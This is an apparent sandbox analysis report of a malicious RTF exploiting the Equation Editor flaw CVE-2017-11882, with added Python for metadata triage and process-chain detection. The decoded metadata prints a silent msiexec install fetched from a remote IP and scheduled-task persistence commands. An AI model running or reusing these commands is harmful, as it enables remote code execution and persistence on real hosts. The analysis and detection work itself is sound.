File name: bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf

Full analysis: https://app.any.run/tasks/904d9d5e-8326-4e8b-862f-be615f260229
Verdict: Malicious activity
Analysis date: April 23, 2019, 13:32:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: ole-embedded, generated-doc, exploit, CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5: B3F8ABE274CB6A5926BD5C3FC2168997
SHA1: D3AE9CAA678754631AED1C82C409B5D43A0A9C80
SHA256: BF9987B84B3F7DAAA460777E5850A60F10898D0238048D3D5D07D7EC1656E47A
SSDEEP: 3072:7Qc9WBKBHFuVPrlmIAzqv/njAa1UWGV0ODJ:7QIW4BluVPR53njAMGVdDJ

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report may have been influenced by analyst actions and is provided as is. ANY.RUN does not guarantee that the content is malicious or safe.
  • MALICIOUS
    • Equation Editor starts application (CVE-2017-11882): EQNEDT32.EXE (PID 2152)
    • Uses Task Scheduler to run other applications: EQNEDT32.EXE (PID 2596)
    • Loads the Task Scheduler COM API: schtasks.exe (PID 3032)
  • SUSPICIOUS
    • Creates files in the Windows directory: EQNEDT32.EXE (PID 2596)
  • INFO
    • Reads Microsoft Office registry keys: WINWORD.EXE (PID 3140)
    • Creates files in the user directory: WINWORD.EXE (PID 3140)
Signature artifacts and their mapping to the MITRE ATT&CK matrix are in the full report.
No malware configuration was extracted.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Title: Dear All
Subject: c2NodGFza3MgL2NyZWF0ZSAvc2MgTUlOVVRFIC90biAiQXBwIiAvdHIgIkM6XFdpbmRvd3NcdHJhY2luZ1x0cmFjaW5nLnZicyIgL21vIDIgL0Y=
Author: Windows User
Comments: U2V0IHdzID0gQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCndzLlJ1biAibXNpZXhlYyAvcSAvaSBodHRwOi8vMTg1LjIzNC43My40L0IiLDA=
LastModifiedBy: AntiSec
CreateDate: 2019:04:17 10:33:00
ModifyDate: 2019:04:17 10:33:00
RevisionNumber: 2
TotalEditTime: 1 minute
Pages: 1
Words: 129
Characters: 741
Company: c2NodGFza3MgL2NyZWF0ZSAvc2MgTUlOVVRFIC90biAiQXBwIiAvdHIgIkM6XFdpbmRvd3NcdHJhY2luZ1x0cmFjaW5nLnZicyIgL21vIDIgL3J1IHN5c3RlbQ==
CharactersWithSpaces: 869
InternalVersionNumber: 24689

Note: the Subject, Comments and Company properties are not document metadata but base64-encoded text (a schtasks /create command line in each of Subject and Company, and a two-line VBScript stub in Comments). Decode them and treat the contents as indicators alongside the dropped files.
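Decoded, the three base64 properties above are operator artifacts rather than metadata. Subject and Company are both `schtasks /create /sc MINUTE /tn "App" /tr "C:\Windows\tracing\tracing.vbs" /mo 2`, differing only in the trailing switch (`/F` in Subject, `/ru system` in Company), and Comments is `Set ws = CreateObject("WScript.Shell")` followed by `ws.Run "msiexec /q /i http://185.234.73.4/B",0`, i.e. a silent MSI install straight from a remote URL. They do not match the command this run actually executed (PID 3032 creates a task named ChromeApp pointing at C:\Windows\tracing\ChromeApp.vbs), so the properties are stale copies, not the live command. The following Python is an added triage example, not part of the report or of any ANY.RUN tooling: the metadata dictionary is copied from the page, while the base64 heuristic, the schtasks parser and the URL regex are this example's own.

```python
"""Triage the document properties of the RTF: decode base64 fields, pull out commands and URLs."""
import base64
import binascii
import re
import shlex

# The document properties exactly as the report's EXIF section lists them (copied from the page).
RTF_METADATA = {
    "Title": "Dear All",
    "Subject": "c2NodGFza3MgL2NyZWF0ZSAvc2MgTUlOVVRFIC90biAiQXBwIiAvdHIgIkM6XFdpbmRvd3NcdHJhY2luZ1x0cmFjaW5nLnZicyIgL21vIDIgL0Y=",
    "Author": "Windows User",
    "Comments": "U2V0IHdzID0gQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCndzLlJ1biAibXNpZXhlYyAvcSAvaSBodHRwOi8vMTg1LjIzNC43My40L0IiLDA=",
    "LastModifiedBy": "AntiSec",
    "Company": "c2NodGFza3MgL2NyZWF0ZSAvc2MgTUlOVVRFIC90biAiQXBwIiAvdHIgIkM6XFdpbmRvd3NcdHJhY2luZ1x0cmFjaW5nLnZicyIgL21vIDIgL3J1IHN5c3RlbQ==",
}

# Heuristic (this example's own): a run of at least 16 base64-alphabet characters plus optional padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def try_decode_b64(value):
    """Return the decoded text if `value` is strict base64 for printable ASCII, else None."""
    if not B64_RE.match(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def parse_schtasks(cmdline):
    """Parse 'schtasks /create /sc MINUTE /tn X /tr "..." /mo 2 /F' into a dict; None if not schtasks."""
    try:
        tokens = shlex.split(cmdline)  # POSIX mode keeps the backslashes inside "..."
    except ValueError:
        return None
    if not tokens or tokens[0].lower() not in ("schtasks", "schtasks.exe"):
        return None
    parsed = {"action": None}
    i = 1
    while i < len(tokens):
        switch = tokens[i].lower()
        if switch in ("/create", "/delete", "/run", "/query", "/change", "/end"):
            parsed["action"] = switch[1:]
            i += 1
        elif switch == "/f":  # boolean switch, takes no argument
            parsed["force"] = True
            i += 1
        elif switch.startswith("/") and i + 1 < len(tokens):
            parsed[switch[1:]] = tokens[i + 1]  # /sc MINUTE, /tn App, /tr <path>, /mo 2, /ru system
            i += 2
        else:
            i += 1
    return parsed


def triage_metadata(meta):
    """Decode every base64-looking property and extract schtasks commands and URLs from the plaintext."""
    findings = {}
    for field, value in meta.items():
        decoded = try_decode_b64(value)
        if decoded is None:
            continue
        entry = {"decoded": decoded}
        task = parse_schtasks(decoded)
        if task is not None:
            entry["schtasks"] = task
        urls = URL_RE.findall(decoded)
        if urls:
            entry["urls"] = urls
        findings[field] = entry
    return findings


if __name__ == "__main__":
    for field, entry in triage_metadata(RTF_METADATA).items():
        print(f"{field}: {entry['decoded']!r}")
        for key in ("schtasks", "urls"):
            if key in entry:
                print(f"  {key}: {entry[key]}")
```

The printable-ASCII check is what keeps ordinary words such as "AntiSec" or "Dear All" from being misreported; they fail the length or alphabet test, and anything that decodes to binary is skipped rather than guessed at.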
All screenshots are available in the full report
Total processes: 36
Monitored processes: 4
Malicious processes: 1
Suspicious processes: 1

Behavior graph

Processes shown in the graph: winword.exe, eqnedt32.exe (two instances), schtasks.exe

Process information

PID 3140: WINWORD.EXE
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 2152: EQNEDT32.EXE
  CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Parent process: svchost.exe
  User: admin
  Company: Design Science, Inc.
  Integrity level: MEDIUM
  Description: Microsoft Equation Editor
  Exit code: 0
  Version: 00110900

PID 2596: EQNEDT32.EXE
  CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Parent process: EQNEDT32.EXE
  User: admin
  Company: Design Science, Inc.
  Integrity level: MEDIUM
  Description: Microsoft Equation Editor
  Exit code: 0
  Version: 00110900

PID 3032: schtasks.exe
  CMD: schtasks.exe /create /sc MINUTE /tn ChromeApp /tr "C:\Windows\tracing\ChromeApp.vbs" /mo 2 /F
  Path: C:\Windows\system32\schtasks.exe
  Parent process: EQNEDT32.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Manages scheduled tasks
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
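Two details of this process tree matter for detection. First, EQNEDT32.EXE (PID 2152) is launched with -Embedding by svchost.exe, not by WINWORD.EXE: the embedded OLE object is activated out of process through DCOM, so a rule that only looks for Word spawning the Equation Editor sees nothing, while a rule keyed on the Equation Editor having any child at all catches both the second EQNEDT32.EXE (PID 2596) and schtasks.exe (PID 3032). Second, the task's action is a .vbs in C:\Windows\tracing, a directory under the Windows folder that is writable at MEDIUM integrity (the report shows exactly that: "Creates files in the Windows directory" by a medium-integrity process). The following Python is an added example of that detection logic, not part of the report: the four events are modelled on the report's processes (PIDs, command lines and image paths as listed, parent paths for explorer.exe, svchost.exe and cmd.exe assumed), the two benign events are constructed negative controls, and the list of user-writable system directories and the ATT&CK technique IDs are the example's own.

```python
"""Process-creation detection for the Equation Editor -> schtasks chain seen in this report."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent (the report lists only names; paths assumed)
    integrity: str = "MEDIUM"


@dataclass(frozen=True)
class Alert:
    pid: int
    technique: str      # MITRE ATT&CK technique ID
    detail: str


EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
RTF = r"C:\Users\admin\AppData\Local\Temp\bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf"

# Constructed sample: the four processes from this report, then two made-up benign events.
SAMPLE_EVENTS = [
    ProcEvent(3140, WINWORD, f'"{WINWORD}" /n "{RTF}"', r"C:\Windows\explorer.exe"),
    ProcEvent(2152, EQNEDT, f'"{EQNEDT}" -Embedding', r"C:\Windows\System32\svchost.exe"),
    ProcEvent(2596, EQNEDT, f'"{EQNEDT}"', EQNEDT),
    ProcEvent(3032, r"C:\Windows\system32\schtasks.exe",
              r'schtasks.exe /create /sc MINUTE /tn ChromeApp /tr "C:\Windows\tracing\ChromeApp.vbs" /mo 2 /F',
              EQNEDT),
    # benign (constructed): a normal out-of-process Equation Editor activation that spawns nothing
    ProcEvent(4100, EQNEDT, f'"{EQNEDT}" -Embedding', r"C:\Windows\System32\svchost.exe"),
    # benign (constructed): an administrator scheduling a binary under Program Files from an elevated shell
    ProcEvent(4200, r"C:\Windows\system32\schtasks.exe",
              r'schtasks.exe /create /sc DAILY /tn Backup /tr "C:\Program Files\Backup\backup.exe" /st 02:00',
              r"C:\Windows\System32\cmd.exe", "HIGH"),
]

SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".bat", ".cmd", ".hta")
# Directories under C:\Windows that standard users can write to (example's own list);
# C:\Windows\tracing is where this sample dropped ChromeApp.vbs and ChromeApp.ps1.
USER_WRITABLE_SYSTEM_DIRS = (
    r"c:\windows\tracing", r"c:\windows\tasks", r"c:\windows\temp",
    r"c:\windows\system32\spool\drivers\color",
)
TR_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)


def image_name(path):
    """Lower-cased file name of an image path, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def schtasks_target(cmdline):
    """Return the /tr value of a 'schtasks /create' command line, or None for anything else."""
    if not re.search(r"(?i)\bschtasks(?:\.exe)?\b.*\s/create\b", cmdline):
        return None
    m = TR_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def detect(events):
    alerts = []
    for ev in events:
        parent, image = image_name(ev.parent_image), image_name(ev.image)

        # Rule 1: the Equation Editor has no business spawning anything; a child process is the
        # CVE-2017-11882 payload running (the report's "Equation Editor starts application").
        if parent == "eqnedt32.exe":
            alerts.append(Alert(ev.pid, "T1203", f"EQNEDT32.EXE spawned {image}: {ev.cmdline}"))

        # Rule 2: a scheduled task whose action is a script sitting in a user-writable system directory.
        if image == "schtasks.exe":
            target = schtasks_target(ev.cmdline)
            if target:
                t = target.lower()
                if t.endswith(SCRIPT_EXT) and any(t.startswith(d + "\\") for d in USER_WRITABLE_SYSTEM_DIRS):
                    alerts.append(Alert(ev.pid, "T1053.005",
                                        f"task action {target} is a script in a user-writable system dir"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"PID {a.pid} [{a.technique}] {a.detail}")
```

Run against the sample, Rule 1 fires twice (PIDs 2596 and 3032) and Rule 2 once (PID 3032); neither benign control trips. Rule 1 is the robust one: Microsoft removed the Equation Editor in January 2018, so on a patched host an EQNEDT32.EXE child of any kind is worth a ticket regardless of what it is.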
Total events: 1 043
Read events: 713
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 1
Text files: 2
Unknown types: 3

Dropped files

PID 3140 (WINWORD.EXE): C:\Users\admin\AppData\Local\Temp\CVR5621.tmp.cvr
  Type: not recorded
  MD5 / SHA256: not recorded

PID 2596 (EQNEDT32.EXE): C:\Windows\tracing\ChromeApp.ps1
  Type: text
  MD5: 7659725493D248C2AB23A7134EB532D0
  SHA256: C5D3550D518024D4B4BE073E6307D1728A05AE3AF8F31A9D31031A4F1CEB85BE

PID 3140 (WINWORD.EXE): C:\Users\admin\AppData\Local\Temp\8.t
  Type: binary
  MD5: C3B087297C2DFDCD44BFF7DF6C4F27DB
  SHA256: 9EC83E7A2B22C3A03DB2C2B84234404D07A81B5B0AFCE52FB83BA8F3DF90B68C

PID 3140 (WINWORD.EXE): C:\Users\admin\AppData\Local\Temp\~$9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf
  Type: pgc
  MD5: 0A778CC6202F02AC5FEFB4099D000158
  SHA256: 6F312809B821E67C7AB30921658ED0200D86D95D91A049F77DC9920D0C45E803

PID 3140 (WINWORD.EXE): C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Type: pgc
  MD5: 03F75A861CC10AD1C3318BEB891B725B
  SHA256: 7EBE4AE513B230A4E93B55D5C5B1A8281E935A6A42B38FA33B58EA5B73980E58

PID 2596 (EQNEDT32.EXE): C:\Windows\tracing\ChromeApp.vbs
  Type: text
  MD5: 520BB90BC1B7E8A8203E9856C209105E
  SHA256: 63A604385DE613DF41870A92FB4D890892C2BB106852549FAB197026CAA8FE2D

PID 3140 (WINWORD.EXE): C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5909E647.wmf
  Type: wmf
  MD5: 82154D73906767D7B810864B32E3EBAD
  SHA256: 6FD66589D2ED5D42039174EA02F331F127EFEB166E61EA3558B0EA7A2B771A77
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 0
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

No data

Threats

No threats detected

No network activity was recorded in this run; the scheduled task (repeating every 2 minutes) and the two scripts dropped into C:\Windows\tracing are the only follow-on stages visible in this report, and their contents are not shown here.
No debug info